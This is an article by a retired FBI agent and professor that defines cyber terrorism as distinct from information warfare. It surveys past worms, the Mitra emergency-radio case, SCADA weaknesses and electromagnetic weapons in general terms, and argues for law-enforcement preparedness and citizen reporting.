By William L. Tafoya, Ph.D.
Anyone ever misquoted recognizes the importance of context. Wrong assumptions about concepts, words, and phrases easily lead to misunderstanding. In the law enforcement community, officers who use a weapon in the line of duty to defend themselves or innocent bystanders may kill but not murder. Context often serves as the crucial variable justifying the use of deadly force. Murder is always killing, but killing is not always murder. Similarly, accurate knowledge of the context and targets of cyber attacks enhances clarity and helps to avoid obscuring intent.
“Cyber terrorism is a component of information warfare, but information warfare is not...cyber terrorism. For this reason, it is necessary to define these topics as separate entities.”1 Said another way, undefined and misunderstood terms easily could lead a conversation to proceed along parallel lines rather than an intersecting track. Thus, differentiating concepts and terms is important, as in the case of understanding what cyber terror is and what it is not.
Dorothy Denning, one often-cited expert, describes but does not define information warfare (IW): “Information warfare consists of offensive and defensive operations against information resources of a ‘win-lose’ nature.” Further, “Information warfare is about operations that target or exploit information resources.”2 Nevertheless, several secondary and tertiary sources term her description “Denning’s Definition.”3 Other researchers assert that “Information warfare is combat operations in a high-tech battlefield environment in which both sides use information technology means, equipment, or systems in a rivalry over the power to obtain, control, and use information.”4
IW has several variants. Electronic warfare (EW), primarily a military term, is older than IW and dates back to World War II. Information operations (IO) is the more contemporary military nomenclature. EW and IO both are synonymous with IW. None of the three, however, are synonymous with cyber terror. IW, EW, and IO encompass the use of cryptography (cryptology and cryptanalysis), radar jamming, high-altitude aerial reconnaissance, electronic surveillance, electronically acquired intelligence, and steganography. Cyber terrorists may use these same tools. The distinction, however, is not the technological tools employed but the context and target.
In 1991 during Operation Desert Storm, coalition forces used IW, EW, and IO through the clandestine introduction of viruses and logic bombs into Iraqi Republican Guard (IRG) command-and-control-center computers and peripherals, causing the disruption and alteration of the targeting and launching of Scud missiles.5 Military combatants engaging one another on the battlefield constitutes IW, EO, and IO. Attacking the largely civilian critical infrastructure is not warfare, but terrorism—cyber terror. But, how does cyber terror differ from IW, EW, and IO?
Dr. Tafoya, a retired FBI special agent, is the coordinator of and a professor in the Information Protection and Security Program at the University of New Haven.
The term was coined in the 1980s by Barry Collin who discussed this dynamic of terrorism as transcendence from the physical to the virtual realm and “the intersection, the convergence of these two worlds....”6 The Center for Strategic and International Studies (CSIS) has defined it as “the use of computer network tools to shut down critical national infrastructures (e.g., energy, transportation, government operations) or to coerce or intimidate a government or civilian population.”7 The author defines cyber terror as “the intimidation of civilian enterprise through the use of high technology to bring about political, religious, or ideological aims, actions that result in disabling or deleting critical infrastructure data or information.”
As an illustration in size, this article does not compare to the holdings of the Library of Congress. The loss of the former would be traumatic to the author, but would impact few other people. Loss of the latter, likely irreplaceable, would prove devastating if a cyber attack deleted those files. Of course, neither could compare to the loss of one human life. But, if data or information from any of the nation’s critical infrastructure databases were attacked and destroyed, that certainly would impact quality of life.
One expert asserted that if people wanted to know how much to spend on information security, they should calculate the cost of replacing their hard drives and databases in the event they became intentionally wiped out—then, double that estimate.8 Recently, a graduate student observed that “Cyber terrorism is a critical threat to national security and public policy. The intelligence community (IC) is at a turning point because it is difficult to catch a criminal who establishes an identity in cyberspace. Further, [we are at] a critical point in [time] for public policy because the government will have to devise regulations of electronic data transfer for public, as well as private, information that can be identified and accessed via the Internet.”9
Although some experts assert that no credible evidence exists that terrorists have initiated cyber attacks, groups, such as Hamas and Hezbollah, allegedly undertook such attacks more than a decade ago.10 “Lone wolves” have perpetrated more recent ones. The highest levels of government have emphasized the need to focus on this specter.11
What are the most vulnerable targets of cyber terrorists? What constitutes the significance of the targets and the magnitude of the threat? Does it matter what the threat is called? Does cyber terror constitute an element of computer crime?
More than a half century later, not even the most prominent authorities have reached a consensus about what constitutes computer crime. According to one of the pioneers of this genre, the earliest occurrence of such abuse occurred in 1958.12 The first prosecution under federal law, the Computer Fraud and Abuse Act, Title 18, Section 1030, U.S. Code, was of Robert Tappan Morris, Jr., then a graduate student of computer science, who unleashed the so-called Internet Worm in 1988.13
Along the time continuum, this is where the line begins to blur between “conventional” computer crime and what the author refers to as cyber terror. This genus includes the Melissa Virus (1999), ILOVEYOU Virus (2001), Code Red Worm (2002), Blaster Virus (2004), and Conficker Worm (2008). These attacks differ from extortion, fraud, identify theft, and various scams, all of which certainly are malicious. However, acts of cyber terror as here defined impact society—even the nation—not just an individual, elements of the business sector, or government agencies.
Space limitations do not allow for an incident-by-incident accounting of cyber terror episodes. One example is the case of U.S. v. Mitra. In 2003, Rajib K. Mitra undertook an ongoing attack on a police emergency radio system. Initially, authorities investigated Mitra’s cyber assaults as a violation of Wisconsin state law, but, ultimately, deemed them attacks on the critical infrastructure. The case was prosecuted under federal law (Computer Fraud and Abuse Act). Mitra, a lone wolf, was tried and convicted on March 12, 2004, and later sentenced to 96 months imprisonment. Subsequently, his appeal failed. U.S. Seventh Circuit Court of Appeals judges ruled unanimously, noting that “it is impossible to fathom why any sane person would think that the penalty for crippling an emergency-communication system on which lives may depend should [not] be higher than the penalty for hacking into a Web site to leave a rude message.”14
Clearly, law enforcement agencies need to stay well informed about what the experts think. Most contemporary professionals remain cautious. However, if people wait until they have absolute proof positive, it may be too late. The cyber trends seem clear. Over the course of approximately 13 years, both the number and frequency of instances of digital disorder have intensified, and the sophistication and diversity of types of cyber attacks have increased.
“Clearly, law enforcement agencies need to stay well informed about what the experts think.”
One high-profile specialist contended that “stories of terrorists controlling the power grid, or opening dams, or taking over the air traffic control network and colliding airplanes, are unrealistic scare stories.” He went on to invoke a cost-benefit ratio perspective: “We need to understand the actual risks. Here’s the critical question we need to answer: Just how likely is a terrorist attack, and how damaging is it likely to be?”15 Another authority notes that “threats to the critical infrastructure are becoming increasingly frequent” and goes on to say, “Cyber attacks are one of the greatest threats to international peace and security in the 21st Century.”16 Where there is smoke, is fire not obviously far behind? And, what about the future? What technological innovations will impact the ability to serve and protect in the near-term future?
Concerning the use of the term cyber terror, do experts resemble the proverbial blind men who feel different parts of the same elephant? On the near-term horizon, technological wonders will arise of which the unscrupulous will avail themselves, just as others before them have done.17 But, where do vulnerabilities lie, and what technological tools will terrorists use?
Not the only concern, but certainly a major worry, are supervisory control and data acquisition (SCADA) systems. Closely related are digital control systems (DCS) and programmable logic controllers (PLC). SCADA systems are more ubiquitous than personal computers and laptops combined. Without onsite human intervention, they automatically and remotely collect data from sensors in devices used for industrial processing. They store information in databases for subsequent central-site management and processing.
SCADA systems have existed since the 1960s. In the early days, they were stand-alone, and few were networked. Today, virtually all are accessed via the Internet. This may be great as a cost-cutting measure, but not from an information security perspective. Quietly and without fanfare, SCADA systems have proliferated rapidly—for starters, in the electric, oil, and gas; water treatment; waste management; and maritime, air, railroad, and automobile traffic control industries. SCADA systems also are embedded in “telephone and cell phone networks, including 911 emergency services.”18
These obscure little drone-like computer systems have virtually no security, firewalls, routers, or antivirus software to protect them. They are spread far and wide across the nation, even in some of the most remote places imaginable.19 One anonymous hacker interviewed for a television program said, “SCADA is a standard approach toward control systems that pervades everything from water supply to fuel lines.” He goes on to describe that the systems run operating systems that make them vulnerable.20
“...where do vulnerabilities lie, and what technological tools will terrorists use?”
Electromagnetic pulse (EMP) bombs and high-energy radio frequency (HERF) weapons differ from the malicious codes, computer viruses, and worms of yesteryear. While the latter remain worrisome, EMP and HERF are serious menacing perils of the near-term technological age. EMP devices are compact, and perpetrators can use them to overload computer circuitry. These devices can destroy a computer’s motherboard and permanently, irretrievably erase data in memory storage devices.21 Like EMPs, HERF devices use electromagnetic radiation.22 They, too, deliver heat, mechanical, or electrical energy to a target. The difference is that individuals can focus HERF devices on a specific target using a parabolic reflector.23 HERF, as asserted, does not cause permanent damage—EMP does.24 An array of demonstrations of the power of such homemade devices is depicted at several Web sources, such as YouTube.
Two decades ago, an expert warned about Internet agents, including bots (robots), Web crawlers, Web spiders, and Web scutters, software apps that traverse the Internet while undertaking repetitive tasks, such as retrieving linked pages, specified words or phrases, or e-mail addresses.25 Although bots have served benign functions—for example, harvesting e-mail addresses—for many years, they now loom large as a near-term future IC and policing issue. More recent research supports this contention. Given these forecasts, the question is not what might happen tomorrow, but, rather, how well-prepared law enforcement will be to protect and serve.
Implications for Law Enforcement
Federal agencies responsible for investigating terrorism, including cyber terror, must remain vigilant. This includes ensuring adequate funding for staffing, equipment, and training. But, beyond that, local law enforcement officers must encourage citizens to be alert and to report suspicious behavior. Many local law enforcement agencies have had useful resources, such as citizens’ police academies, for decades. These programs can educate taxpayers about activity in the physical realm that should be reported. However, what about transcendence to the virtual realm? Since 1996, the FBI’s InfraGard Program, an information sharing and analysis effort, has focused on marshaling the talents of members of America’s information security (INFOSEC) community.26 However, what of “main street USA”?
“...law enforcement agencies should be prepared to deal with the aftermath of hard-to-forecast, but not regularly reoccurring, cyber attacks on the nation’s critical infrastructure.”
"See Something, Say Something" is a terrific crime prevention slogan promoted in New York City.27 It seems to have resonated recently in Times Square when an observant man, a street vendor and Vietnam veteran, alerted the New York Police Department to the SUV used in what turned out to be, fortunately, a failed Taliban-sponsored car-bombing attempt.28 Any such program should be augmented to provide to its participants examples of behavior in the business community, including those in a work environment, that could alert authorities to precursors of potential cyber misdeeds. Just as someone does not need specialized education to recognize threats in real life, anyone can recognize these digital threats. One authority notes that “an example of suspicious behavior might be a bit of malicious program attempting to install itself from opening an office document.” To reduce the threat, employees could add a “‘behavior’ layer to [antivirus products].”29 Of course, this suggestion could unnerve many civil liberty-oriented watchdog organizations; there is no reason not to include such agencies in the discussion, planning, and implementation of the augmentation here proposed. What, then, is the bottom line?
Earthquakes, hurricanes, tsunamis, tornadoes, volcanoes, toxic spills, forest fires, and shark attacks do not occur with great frequency. Precautions, nevertheless, are in place to protect people from the physical threats posed when these natural but seldom-occurring violent events occur. Although they cannot be forecast with great accuracy, we are prepared for them. Similarly, law enforcement agencies should be prepared to deal with the aftermath of hard-to-forecast, but not regularly reoccurring, cyber attacks on the nation’s critical infrastructure.
Criminals are menacing our cyber shores, preparing to launch a large-scale attack. What is clear is that it will happen. What is not obvious is by whom or when. Respected INFOSEC authorities have made a compelling case for the “swarm”—attacks via different paths by dispersed cells. Al Qaeda already has demonstrated an understanding of the technique.30 Other countries, such as India, Saudi Arabia, China, France, Brazil, and Spain, already have experienced such attacks.31 Additionally, well-known U.S. companies have reported major breaches targeting source code.32
Cyber terrorists are pinging ports and probing our digital fortifications as they endeavor to identify vulnerabilities. Daily crackers and terrorists are skulking, battering firewalls, and learning more each time they do so. Clearly, preparations to thwart such attacks are necessary.
“...officers must encourage citizens to be alert and to report suspicious behavior.”
The skills, tools, and techniques are the same, but information warfare is conducted between military combatants; cyber terrorism targets civilians. Cyber terrorists indiscriminately will attack the nation’s critical infrastructure and civilians—the innocent. Thus, the context and targets, not the technological tools or frequency of attacks, are the more appropriate delimiters that distinguish cyber terror from information warfare.
Some of these criminals are being caught and prosecuted, but more remain undetected. To best serve its motto, “to protect and serve,” law enforcement must proactively guard this country’s national security on every front.